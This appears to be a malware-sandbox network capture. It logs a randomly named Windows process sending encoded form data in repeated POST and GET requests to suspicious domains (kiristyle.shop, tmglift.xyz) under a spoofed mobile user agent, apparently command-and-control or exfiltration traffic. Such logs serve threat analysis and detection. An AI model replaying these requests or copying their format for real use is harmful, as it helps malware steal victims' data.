3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.11.20	49825	35.244.245.121	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:47:58.440512896 CEST	1134	OUT	POST /x85c/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.kiristyle.shop Origin: http://www.kiristyle.shop Referer: http://www.kiristyle.shop/x85c/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 31 4f 6f 77 31 76 70 36 63 6e 4d 4b 6c 33 78 34 49 39 39 45 4c 67 77 37 56 34 53 58 52 41 2f 79 62 7a 39 6f 6a 45 69 6d 47 6b 69 48 78 74 51 30 36 33 38 6a 57 4b 7a 56 56 57 6f 4c 39 6c 77 6b 58 76 44 30 6d 43 4d 50 63 56 75 50 34 2f 4c 71 2b 41 35 49 6a 5a 7a 6a 4d 44 75 4f 50 55 74 35 68 78 58 4d 50 6f 46 6a 64 35 70 39 79 43 74 54 75 2f 57 77 59 57 78 6b 4c 4e 78 44 34 43 55 47 55 6a 71 4f 38 49 33 4a 4a 55 71 2f 38 58 45 66 56 63 65 66 4a 2f 61 67 49 7a 78 51 52 54 58 34 50 49 56 36 69 6b 33 74 68 42 54 50 76 69 33 2f 6b 61 6b 51 4d 6a 47 6b 6e 56 70 43 77 47 6f 2f 56 77 4d 6c 6e 75 6a 44 4b 76 4a 55 46 4b 4f 48 75 61 41 5a 72 68 67 79 53 47 75 52 45 66 4c 57 6d 76 6a 65 69 70 58 31 59 51 30 69 4f 6a 76 36 5a 54 6f 35 38 2f 37 50 57 74 73 61 70 65 69 4e 49 79 62 55 41 78 4d 65 47 46 54 2f 4b 64 51 39 47 77 79 53 77 4e 56 51 74 48 70 75 67 4e 4b 74 79 64 46 70 67 34 54 41 63 38 32 4b 66 76 4e 57 52 55 32 6c 56 43 4c 77 75 4f 6f 4d 6a 75 6a 68 76 50 35 65 54 64 63 4e [TRUNCATED] Data Ascii: AvLLLbOh=V1Oow1vp6cnMKl3x4I99ELgw7V4SXRA/ybz9ojEimGkiHxtQ0638jWKzVVWoL9lwkXvD0mCMPcVuP4/Lq+A5IjZzjMDuOPUt5hxXMPoFjd5p9yCtTu/WwYWxkLNxD4CUGUjqO8I3JJUq/8XEfVcefJ/agIzxQRTX4PIV6ik3thBTPvi3/kakQMjGknVpCwGo/VwMlnujDKvJUFKOHuaAZrhgySGuREfLWmvjeipX1YQ0iOjv6ZTo58/7PWtsapeiNIybUAxMeGFT/KdQ9GwySwNVQtHpugNKtydFpg4TAc82KfvNWRU2lVCLwuOoMjujhvP5eTdcNeeso3nwQg3fHqZPQ2eOdlYsla0HDweG7Nd8F1Y4fZpUxkjgPSgGAAgf6W8DXL19e8UQaHbkaWPsgo7vrBM4xZ1WQykKG2Tzdpm3c4+k8ZBm86dtvooBWF4BouD0zCrqu0F7gYn5dtPVatS3Ca8yaPlbj/vmqZjm1NgHlSBbZLqMWKfrF2yO9R9M/niXs+0urXzddjI7J88Tu9c=
Aug 27, 2024 17:47:58.613126993 CEST	357	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 27 Aug 2024 15:47:58 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kiristyle.shop/x85c/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.11.20	49826	35.244.245.121	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:48:01.081391096 CEST	5156	OUT	POST /x85c/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.kiristyle.shop Origin: http://www.kiristyle.shop Referer: http://www.kiristyle.shop/x85c/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 31 4f 6f 77 31 76 70 36 63 6e 4d 4b 6c 33 78 34 49 39 39 45 4c 67 77 37 56 34 53 58 52 41 2f 79 62 7a 39 6f 6a 45 69 6d 47 38 69 48 6b 35 51 7a 72 33 38 69 57 4b 7a 4a 6c 57 70 4c 39 6c 58 6b 58 6e 35 30 6d 48 35 50 66 74 75 4f 70 76 4c 71 4d 34 35 44 7a 5a 79 76 73 44 6f 4b 50 56 32 35 68 39 35 4d 4d 55 56 6a 74 6c 70 38 78 32 74 43 4e 6e 4a 79 49 57 33 6b 4c 4e 74 4f 59 44 70 47 55 33 36 4f 38 30 33 4a 4c 67 71 35 4f 76 45 5a 45 63 65 57 35 2f 5a 6d 34 7a 79 5a 78 53 74 34 50 63 42 36 69 6b 34 74 6c 35 54 50 73 47 33 38 6e 69 6e 52 73 6a 47 36 33 56 71 51 41 4b 73 2f 55 59 55 6c 6d 71 6a 44 4e 54 4a 56 6c 4b 4f 52 63 79 44 64 4c 68 6d 32 53 48 34 41 55 6a 44 57 69 48 64 65 6e 35 58 32 6f 55 30 74 5a 50 76 38 34 54 6f 77 38 2f 75 44 47 73 32 52 4a 65 2b 4e 4d 57 68 55 41 52 36 65 45 4a 54 75 61 39 51 33 43 6b 74 47 67 4d 51 4a 74 48 34 6b 41 42 47 74 7a 73 61 70 67 35 4f 41 5a 63 32 4a 76 2f 4e 58 55 67 31 6e 46 43 41 39 4f 50 77 43 7a 69 54 68 73 71 32 65 53 6c 71 4e [TRUNCATED] Data Ascii: AvLLLbOh=V1Oow1vp6cnMKl3x4I99ELgw7V4SXRA/ybz9ojEimG8iHk5Qzr38iWKzJlWpL9lXkXn50mH5PftuOpvLqM45DzZyvsDoKPV25h95MMUVjtlp8x2tCNnJyIW3kLNtOYDpGU36O803JLgq5OvEZEceW5/Zm4zyZxSt4PcB6ik4tl5TPsG38ninRsjG63VqQAKs/UYUlmqjDNTJVlKORcyDdLhm2SH4AUjDWiHden5X2oU0tZPv84Tow8/uDGs2RJe+NMWhUAR6eEJTua9Q3CktGgMQJtH4kABGtzsapg5OAZc2Jv/NXUg1nFCA9OPwCziThsq2eSlqNfaspXnwVHrYNaZUdWeQeVZzlaJuDxa468B8EFo4IZpT1EjkBygMKggf6WByXLx9dIYQbwXkRnPsio7trBMTxZp1QycgGyvNdv23dpOkvtVh4Kdorooacl0Woqq7zC7UuD17hY35XNPWRdS8Fa9xQvpfj/zYqYX21KcHlUw5C4GVHZrXZFGF2hRE4EWI8YwehAr0TQsVSNs7w6zaUxlFwZhvqwGmL0qZRFZ9Hcth4OzKFvKtW16UA3X6Xrd1DnjkGj1uSf0ctbFnkMVMQZ8Pop8VzekJvrlS9oYHj57NcBB4p8y4sRIvD81FvIQ7N7fvHn0iS8NDKqJHCMWB6j/ht7jhLVVWUN/zENP3MF1h8Fa4JYloDKUUOrjtuExj0x8n8dgawwlhOD3E+drgh6yeItSLwQ1nWptjS0IJ3p0iQJ3/NWkp212G5wYzQmNM6se0hpCq+9RTseYrJBosj8NV7q32X+/x/XrK32bFK5NxewFAETdTqN3XhhLnvwJH3DD+zvaXAXiRkLNGwWpLRwYEkEx70599NA+4Thgqyj3+Vu66K0g4Wo1gXeCyr2BH0mms0HOSF8pLoWgMwY7JSV7qRxPLDBrlJp8DgFvvcX3yhERLnru2ZPN3vgDIYv63sKmyQVmDCFuDsUrJX2qKDPQE9QeQKsFDHdXVTeD [TRUNCATED]
Aug 27, 2024 17:48:01.081413984 CEST	6445	OUT	Data Raw: 51 70 63 61 46 36 52 36 63 42 61 52 63 39 52 44 53 74 63 6b 2f 63 54 35 32 62 74 74 32 79 63 6a 47 7a 4f 78 58 34 62 30 41 44 45 4f 75 75 4e 39 45 57 66 65 6d 38 77 70 54 52 4f 57 57 62 30 75 78 74 4c 56 4a 76 4e 2f 59 73 62 48 38 36 65 4d 62 46 Data Ascii: QpcaF6R6cBaRc9RDStck/cT52btt2ycjGzOxX4b0ADEOuuN9EWfem8wpTROWWb0uxtLVJvN/YsbH86eMbFvQvC+K4Qg2p6yZ19nAtR8iyR0QwsIAb3gaxStho0cxuGr3KScR1zuyTrhxfuaYlRsLHSfgh1gQu86D5lwkxsZ9aOsz5FhX7fWPQka5GwkLoY/cvjTEJzGTILqMQYbyWAQTmh6uGnz43tqodIIAnsrPx4EF+Vd/udR
Aug 27, 2024 17:48:01.081459999 CEST	1289	OUT	Data Raw: 32 6a 2f 58 48 6b 45 57 62 66 57 64 32 6a 6c 61 6c 2f 7a 69 6c 73 33 48 53 38 78 51 66 6c 76 38 6a 50 6a 5a 68 2b 32 33 33 2b 2f 31 54 53 64 75 62 75 4d 2f 7a 6a 39 65 68 4b 31 6a 65 4f 65 37 6c 47 43 48 34 4b 50 2b 6e 45 57 72 66 41 44 2f 46 47 Data Ascii: 2j/XHkEWbfWd2jlal/zils3HS8xQflv8jPjZh+233+/1TSdubuM/zj9ehK1jeOe7lGCH4KP+nEWrfAD/FG6YEu9xuTjCF8HYq3sscxbMufR0Obc0A2gspN0SjRiHKhMZN2qwYfW4geNuqqYPfenMwY1DEazwnHQIcqNLlpT4IqNK8e992Y1V2yCHEUNUdJE3bZKq0wKQ6W1i9bWICrF7YhINi24/l9YZa2G9sQulcNPPxzrnGVm
Aug 27, 2024 17:48:01.183325052 CEST	2578	OUT	Data Raw: 5a 69 35 50 4b 76 70 62 6c 44 64 2b 62 66 71 6b 42 46 71 6d 4e 38 4b 38 2f 70 72 36 68 5a 48 70 58 4e 37 41 37 70 57 4d 61 77 39 69 66 48 48 44 34 56 7a 69 53 6a 6e 4f 71 61 39 69 34 65 74 57 56 63 48 6e 48 44 34 4c 59 75 5a 30 71 31 74 69 38 63 Data Ascii: Zi5PKvpblDd+bfqkBFqmN8K8/pr6hZHpXN7A7pWMaw9ifHHD4VziSjnOqa9i4etWVcHnHD4LYuZ0q1ti8cUvPq2GQrPaYO9pVxhncr8AhZS5RFuA8Ourn4XsC+BPST/egm04toyiwFnTeb+hwmPitOR4KcW4Q7xJxPYfelN0mwCZoIao/U3nMnuvMrWIPvRGcTRulGNw9UdJaqQRTmN3ycSyqTEuana9Sw9QoT8nNT7QKEHvSBc
Aug 27, 2024 17:48:01.183394909 CEST	10312	OUT	Data Raw: 2f 37 37 58 4a 4a 78 7a 56 53 55 38 46 47 4b 6d 4b 55 45 2b 30 30 5a 79 4d 49 65 58 78 4a 41 71 75 70 43 71 54 77 4d 34 61 36 58 74 56 77 4c 33 51 4a 52 47 35 4d 30 52 64 54 56 4e 63 59 4b 4d 68 44 30 70 55 6f 4e 30 6c 75 72 6e 30 74 33 50 59 52 Data Ascii: /77XJJxzVSU8FGKmKUE+00ZyMIeXxJAqupCqTwM4a6XtVwL3QJRG5M0RdTVNcYKMhD0pUoN0lurn0t3PYRfQ+u9jmWCyd3sRQueI3KJbwgQ037Cc820HLY+riwsYyGzsLLl9r7716hfhjMELMT7Fe9fAG89hlPLhnpDlhzYvXmksoVVwuaakQr86Xhhc7vdnFNHdRLeqBHi4Ebm22V+paI4fJf6BtUNvjgLT71ZSxNs1UPF3De1
Aug 27, 2024 17:48:01.183413029 CEST	2578	OUT	Data Raw: 52 35 41 5a 66 78 71 73 49 77 57 39 32 4a 43 6f 57 47 61 42 58 39 41 57 6c 64 6c 35 47 76 68 41 6a 66 30 63 43 39 76 46 41 41 55 67 70 4e 35 61 61 6d 4b 53 7a 53 54 6d 52 43 6e 6d 4e 67 52 35 37 69 32 6d 32 31 4a 42 44 37 45 35 6d 48 47 2b 2f 52 Data Ascii: R5AZfxqsIwW92JCoWGaBX9AWldl5GvhAjf0cC9vFAAUgpN5aamKSzSTmRCnmNgR57i2m21JBD7E5mHG+/RpUciDPpZSjKZSCzBQUrZ/l4sGEccyKKkmO3L2Ss0t/cPWHzlIBsXCA3qG4UO4Akc2ErlUj596n4bhDp5lEuTdzh+BTIQ5hHeY6T6DKYT7UpkqkNAVxkGDNfSWNRAl0DG5gXcuR/x2ta15QXA8td3EFDShjpNxC+wB
Aug 27, 2024 17:48:01.183602095 CEST	2578	OUT	Data Raw: 68 55 56 49 72 38 75 70 69 2f 4b 30 57 6b 43 63 73 6e 55 50 68 48 63 5a 39 39 39 74 70 50 63 67 44 4c 30 58 38 72 54 41 41 34 42 6b 2b 69 38 32 59 61 68 37 6c 63 49 68 53 5a 4f 55 70 37 49 48 49 57 49 30 57 6c 41 66 59 71 2f 39 55 79 63 58 75 64 Data Ascii: hUVIr8upi/K0WkCcsnUPhHcZ999tpPcgDL0X8rTAA4Bk+i82Yah7lcIhSZOUp7IHIWI0WlAfYq/9UycXud7CYtJxmxbiNa9g4gws3AMtugvuVid85uJdBmnkqgweKhwMDvnt9PlILLc5FcKjB9t6seyQiEKkxMQ6DLpoh0Fs4z0om+tMyBiDONXA5VCY1AS03Na5/gDf6hf7KnxxZK1tVtne2ZuKHXiKlck/JgmOd7v6fQhKxUF
Aug 27, 2024 17:48:01.183917999 CEST	1289	OUT	Data Raw: 58 74 56 57 4c 49 45 71 72 35 4c 4f 7a 64 42 58 51 43 7a 78 63 38 58 6a 5a 39 67 4e 58 45 50 65 54 36 58 2f 6d 59 56 6c 56 41 6d 31 4a 52 79 4d 50 34 75 37 68 32 65 63 36 5a 42 65 45 50 31 43 52 51 52 62 57 55 74 74 68 57 70 65 37 45 64 5a 72 69 Data Ascii: XtVWLIEqr5LOzdBXQCzxc8XjZ9gNXEPeT6X/mYVlVAm1JRyMP4u7h2ec6ZBeEP1CRQRbWUtthWpe7EdZriedGcavkm/0RkjkKOshvX0cpPgyi7iUD8WKeYBJYMZd1PiI8CBRAHNQs6MSkc6RD6nkicYTI7bpucc0TItWsGOmQp8LuGtnSnqTDBeoYTT8pWPdVA5WVNLvnuSqLpE9NAjMlyjx7Q46IplvpdHk2uWvicFKfQqAvNq
Aug 27, 2024 17:48:01.184115887 CEST	6445	OUT	Data Raw: 57 50 42 56 36 44 42 35 37 31 77 72 58 48 39 2f 4b 64 79 36 52 38 30 4d 64 50 68 6c 4a 49 54 37 6a 4e 44 4a 35 72 59 70 59 54 37 69 47 54 6f 4c 5a 37 4c 59 49 36 49 58 54 7a 45 45 54 56 71 57 57 71 78 4b 7a 5a 79 6f 66 78 4c 41 77 4b 35 38 48 4f Data Ascii: WPBV6DB571wrXH9/Kdy6R80MdPhlJIT7jNDJ5rYpYT7iGToLZ7LYI6IXTzEETVqWWqxKzZyofxLAwK58HO+ircsp/jDB+Bg7h0K8UZos8CmpYPG5irN2/FZDGLgMRMjDEFlZS9E1ZUISX06zNM53Yrt5jCm6u5J5mUMGWOSskVdWfzH7jcP2vVzgpYmS9gOKqIMyqEcbcuGF9VV6B0LuPynAmV8ZoSjJ7N3C999EbW8XOCpXjgA
Aug 27, 2024 17:48:01.240520954 CEST	357	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 27 Aug 2024 15:48:01 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kiristyle.shop/x85c/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Aug 27, 2024 17:48:01.285449028 CEST	2578	OUT	Data Raw: 50 77 49 6f 45 77 44 7a 54 56 76 74 36 59 50 76 77 2b 31 37 4a 41 6e 33 68 49 4c 6e 49 66 6c 35 2f 54 67 65 6c 53 4a 36 4e 6e 55 71 6e 53 58 6a 71 5a 6e 63 4d 4c 30 73 43 79 6c 44 67 34 30 49 53 33 6e 68 38 42 51 39 44 34 57 79 61 76 7a 55 61 79 Data Ascii: PwIoEwDzTVvt6YPvw+17JAn3hILnIfl5/TgelSJ6NnUqnSXjqZncML0sCylDg40IS3nh8BQ9D4WyavzUayz9+OEa/tU60A4b0huiG/C9sxzJsc92j62WCvFbFy4xcZu7WOKmBidr5J17wz/w8HmQGLFuV85JPQ/yG9Em4+FJM/8UYzwBQrt4m4eb5sftrXLEJv9n1HgXjDXPcYe4/GbBl5Y3ZZY48liAidcNZ3peoL7re71lmwe
Aug 27, 2024 17:48:01.285471916 CEST	5156	OUT	Data Raw: 76 61 79 6e 67 64 46 52 70 79 43 6c 48 6c 33 63 32 33 54 70 78 39 5a 4e 4d 68 6b 44 7a 59 79 35 4c 77 69 55 4d 78 51 64 51 68 6f 55 42 77 55 56 6b 5a 59 31 57 47 2b 51 49 66 30 37 50 39 55 61 70 73 34 58 46 38 6a 66 4b 51 4e 63 6d 49 57 63 74 6a Data Ascii: vayngdFRpyClHl3c23Tpx9ZNMhkDzYy5LwiUMxQdQhoUBwUVkZY1WG+QIf07P9Uaps4XF8jfKQNcmIWctj0RDtN6TIXbFUIAsrbWlrARphiv/1iFVrj+qLIjWE7RniDTP8XEBx2IS00eCXusm6JMCgqzJEqd3AE7yi+5UMSZpCkenAMwbI96DqMzYNYBMqEquB2K3YwskOl/ZW2SMZkDOw08BOIeNjY2ALEAwNFntnqv++DXg5e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.11.20	49827	35.244.245.121	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:48:03.719196081 CEST	527	OUT	GET /x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.kiristyle.shop Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:48:03.891381025 CEST	500	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 27 Aug 2024 15:48:03 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kiristyle.shop/x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.11.20	49828	85.159.66.93	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:48:09.679625034 CEST	785	OUT	POST /fu44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.tmglift.xyz Origin: http://www.tmglift.xyz Referer: http://www.tmglift.xyz/fu44/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 42 6e 6a 62 43 64 47 31 37 62 41 77 43 52 76 4b 78 42 34 49 2b 65 54 4f 62 54 49 37 78 6b 5a 6e 71 6d 71 79 56 58 6b 52 64 44 73 49 46 43 39 53 50 78 79 6d 76 31 54 4b 2f 50 53 72 72 78 4a 6f 37 2f 7a 70 66 47 47 62 63 67 55 4e 50 74 33 78 39 53 6d 34 52 58 64 49 50 35 4f 2b 59 65 6c 72 75 59 6c 5a 75 51 6c 73 77 70 55 62 75 6a 63 4a 68 63 48 33 77 70 57 52 45 4c 63 68 62 41 4e 74 5a 55 44 6d 6a 4f 50 4a 55 65 49 30 51 48 59 31 59 7a 69 2b 54 6a 5a 30 43 65 38 52 33 76 51 2b 55 53 4c 46 55 63 55 41 44 6d 4d 63 67 4e 2b 5a 47 5a 67 72 2f 56 58 46 71 32 78 34 4b 50 36 61 6d 67 3d 3d Data Ascii: AvLLLbOh=BnjbCdG17bAwCRvKxB4I+eTObTI7xkZnqmqyVXkRdDsIFC9SPxymv1TK/PSrrxJo7/zpfGGbcgUNPt3x9Sm4RXdIP5O+YelruYlZuQlswpUbujcJhcH3wpWRELchbANtZUDmjOPJUeI0QHY1Yzi+TjZ0Ce8R3vQ+USLFUcUADmMcgN+ZGZgr/VXFq2x4KP6amg==
Aug 27, 2024 17:48:09.906615973 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 15:48:09 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-27T15:48:14.7949232Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.11.20	49829	85.159.66.93	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:48:12.434484005 CEST	1125	OUT	POST /fu44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.tmglift.xyz Origin: http://www.tmglift.xyz Referer: http://www.tmglift.xyz/fu44/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 42 6e 6a 62 43 64 47 31 37 62 41 77 45 77 2f 4b 68 57 6b 49 34 2b 54 4a 48 44 49 37 6f 55 5a 6a 71 6d 6d 79 56 57 78 4d 63 31 38 49 46 6a 4e 53 4f 77 79 6d 38 46 54 4b 71 2f 53 55 6d 52 4a 5a 37 2f 2f 58 66 48 36 62 63 67 41 4e 4f 65 2f 78 70 79 6d 35 46 48 64 50 49 35 4f 7a 53 2b 6c 68 75 59 70 2f 75 52 78 73 33 61 51 62 76 67 30 4a 79 35 7a 30 68 5a 57 58 43 4c 63 75 4f 77 4e 7a 5a 55 66 45 6a 4c 4c 5a 58 76 73 30 51 6d 34 31 4b 6a 69 39 62 54 5a 7a 4f 2b 38 46 2b 39 35 71 64 42 48 4d 48 39 30 4d 4b 45 38 47 72 36 71 70 43 6f 45 62 69 41 62 42 7a 79 4d 57 66 2b 75 53 35 72 6f 6b 44 4b 36 4e 62 59 42 37 75 72 34 74 53 69 54 30 43 61 72 64 6f 2f 35 38 39 41 64 75 2b 4c 58 62 46 41 45 47 38 46 74 4d 48 72 49 6e 41 37 68 4e 41 4e 49 57 43 72 73 78 44 65 31 62 7a 67 36 5a 4f 6e 74 65 4b 4c 34 34 5a 59 57 54 56 61 73 4d 61 56 32 4a 71 74 68 77 38 68 4b 77 61 73 6a 55 4d 76 2f 77 59 41 32 2b 33 47 4e 4f 47 77 71 49 30 51 4c 6a 68 42 43 52 36 55 43 43 6c 34 38 6a 77 4e 4f 54 46 [TRUNCATED] Data Ascii: AvLLLbOh=BnjbCdG17bAwEw/KhWkI4+TJHDI7oUZjqmmyVWxMc18IFjNSOwym8FTKq/SUmRJZ7//XfH6bcgANOe/xpym5FHdPI5OzS+lhuYp/uRxs3aQbvg0Jy5z0hZWXCLcuOwNzZUfEjLLZXvs0Qm41Kji9bTZzO+8F+95qdBHMH90MKE8Gr6qpCoEbiAbBzyMWf+uS5rokDK6NbYB7ur4tSiT0Cardo/589Adu+LXbFAEG8FtMHrInA7hNANIWCrsxDe1bzg6ZOnteKL44ZYWTVasMaV2Jqthw8hKwasjUMv/wYA2+3GNOGwqI0QLjhBCR6UCCl48jwNOTFL7Os876j9EkMJN0ywqBWD1cQji04UdcZ1/swrNnH3QGkmtaRfUOwuqkx7mSo7EmbOreExkf572NEQYoam+5KDpIu2Pk8fJegB38GNBboZa62YxhSw17Oh2BmSTozmwiSgHF80hz2p4XZgkF3cDA3HRHBhRFGbMHZoafXCzo6P5GPLDGbC+hcpvyT5fx213oiDXtYqAf13cyw0c=
Aug 27, 2024 17:48:12.659853935 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 15:48:12 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 18 X-Rate-Limit-Reset: 2024-08-27T15:48:14.7949232Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.11.20	49830	85.159.66.93	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
